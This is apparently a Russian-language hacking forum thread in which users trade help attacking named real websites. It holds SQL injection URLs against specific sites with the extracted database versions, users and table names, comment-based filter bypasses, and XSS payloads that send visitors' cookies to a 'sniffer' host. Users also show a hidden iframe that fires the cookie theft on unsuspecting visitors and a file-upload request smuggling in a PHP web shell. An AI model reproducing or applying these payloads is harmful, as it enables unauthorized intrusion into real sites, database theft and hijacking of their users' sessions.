Ваши вопросы по уязвимостям.

http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??

 

проверяются вхождения в строке, врятли обойдешь

 

Не слушай никого, все выводится

5.0.51a-24+lenny5:a28161_studyguid:a14801@localhost:debian-linux-gnu

 

http://www.studyguide.ru/library.php
?search=2
&form[name]=-1'+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4,5--+
&form[word]=

Интересно бы саму скуль увидеть или метод.

 

Подскажите как можно дальше вывесли какие либо данные

 

Error-based:

Code:

http://www.indexcopernicus.com/info.php?id=6)+and(select+1+from(select+count(*),concat((select+concat(table_name,0x00)+from+information_schema.tables+limit+20,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f

Result:

Code:

Duplicate entry 'users' for key 1

 

подскажите альтернативу Charles

 

tamper data

 

не не тампер не пропрёт а уже всё тенкс.

 

Здараствуйте, подскажите пожалуйста.. Нашел
http://vsetke.ru/registration/registration_form.jsp
xss При вставке в поля имя и пароль
"><script>alert(/xss/)</script>
Подскажи как можно вытащить куки ?

 

Количество столбцов 1, но почему ошибку все равно выдает ?

 

попробуй вывод в ошибке, там походу нет вывода столбцов вот так крути
http://www.poezia.ru/article.php?sid=65755+and(select+count(*)+from+information_schema.tables+group+by(concat(version(),0x00,floor(rand(0)*2))))--+

 

Code:

http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+count(*),concat((select+version()),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f

Code:

Duplicate entry '[B]5.0.27[/B]' for key 1

Code:

http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+count(*),concat((select+concat(table_name,0x3a,column_name,0x00)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f

Code:

Duplicate entry 'CHARACTER_SETS:CHARACTER_SET_NAME' for key 1

 

Code:

<script>img = new Image(); img.src = "http://sniffer?"+document.cookie;</script>
<script>location.href = "http://sniffer?" + document.cookie;</script>

 

PHP:

"><script>(new Image()).src='http://site.com/sniffer.php?'+document.cookie</script>

Можно отправлять GET-запросом

Вставляешь на свой сайт скрытый фрейм

PHP:

<iframe style="width:0px;height:0px;visibility:hidden" src="http://vsetke.ru/registration/registration_form.jsp?email_address=&#34><script>(new Image()).src='http://site.com/sniffer.php?'&#43document.cookie</script>"></iframe>

Когда юзер зайдет на сайт, куки отправятся на сниффер. В IE и хроме этот вариант не сработает из-за фильтров.

p.s.:
В этом примере используется GET-запрос, потому что реализация атаки проще. Но если есть возможность, лучше использовать POST-запрос для эксплуатации XSS.

 

Потому что несколько запросов к базе. В первом один столбец, во втором больше.

 

что можно сделать в подобном случае?

ответ
error setting cookie

 

Code:

POSTDATA =-----------------------------114782935826962
Content-Disposition: form-data; name="f[id]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[galery_id]"

1565
-----------------------------114782935826962
Content-Disposition: form-data; name="f[order_id]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ru]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_en]"


-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ua]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_small]"; filename=""
Content-Type: application/octet-stream


-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_big]"; filename="d00m.php"
Content-Type: unknown/unknown

<?php #v2.3	//Version

подскажите в перехвате даных как изменить конечное имя на например 1.php, потому что меняется на 89.img

 

http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)
вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??

 

У тебя запятые фильтруется. Вместо пробела юзай /**/, а комментарии /*. Пока такой вид:

Code:

http://www.bluegrassmidwest.com/details.php?id=6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/2)y/**/join(select/**/3)z/*

Code:

The used SELECT statements have a different number of columns

Сейчас докрутим

UPD.

Code:

http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/[COLOR=Magenta]version()[/COLOR])y/**/join(select/**/[COLOR=Magenta]user()[/COLOR])z/**/join(select/**/[COLOR=Magenta]database()[/COLOR])a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*

Code:

5.0.22:web115u1@localhost:web115db1

Удачи